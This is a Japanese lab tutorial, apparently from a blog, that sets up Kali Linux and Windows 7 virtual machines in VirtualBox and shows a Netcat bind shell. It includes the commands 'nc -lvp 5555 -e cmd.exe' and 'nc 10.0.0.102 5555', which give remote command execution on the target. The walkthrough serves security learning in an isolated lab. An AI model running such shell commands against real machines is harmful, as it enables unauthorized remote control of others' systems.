<攻撃前の準備>
攻撃をする前に、ゲストOS,ホストOSを接続できる状態にします。
①virtualboxで、攻撃用サーバー(Kalilinux)とターゲット用サーバー(Windows7)を立てる
②仮想マシンのネットワーク設定を以下のように設定する。
Kalilinux:アダプタ1→NATアダプタ
アダプタ2→ホストオンリーネットワークアダプタ
Windows7 : アダプタ1→ホストオンリーネットワークアダプタ
③ゲストOSとゲストOS、ゲストOSとホストOSの接続を確認する
(ifconfig+ping)
④ pingが通らない場合は、ファイアウォール設定を確認する
(ホスト・ゲストともにwindows側でICMP Echo要求を有効化する)
<ターゲット端末を遠隔操作する(by Netcat)>
ここからは、実際の攻撃を行います。
WindowsにNetcatがインストールされている前提で話を進めます。
① Netcatでwindowsへ接続する
Kaliでterminalを起動して、windowsへ接続します。
root@kali:~ nc 10.0.0.102 5555
windows側でnetstatコマンドを実行すると、KaliのIPアドレスとポート番号が表示されます。
また、接続状態(state)はestablishedとなります。
②Kaliとwindowsでデータをやり取りする
kali側のterminalで以下のように実行すると
root@kali:~# nc 10.0.0.102 5555
hello
windows側のterminalで
hello
と表示されます
③ 以上を用いてバインドシェル(攻撃端末からターゲット端末に接続するシェル)を行います。
(1)Windows側で実行されるシェルを指定する
C:|Work|nc111nt>nc/exe -lvp 5555 -e cmd.exe
listening on [any] 5555
(2)kaliからwindowsへアクセスする
root@kali:~# nc 10.0.0.102 5555
(3)遠隔操作でコマンドを実行する
コマンドプロンプトの表示内容がKaliのterminalに表示されます。
例えば、
C:\Work\nc111nt>whoami
whoami
ie8win7\ieuser
のように、kali側で入力したコマンド(上の例ではwhoami)がエコーされて表示されますが、そのあとにコマンドの出力結果が表示されます。
この時点で、Kali側がwindows側を遠隔操作出来ています。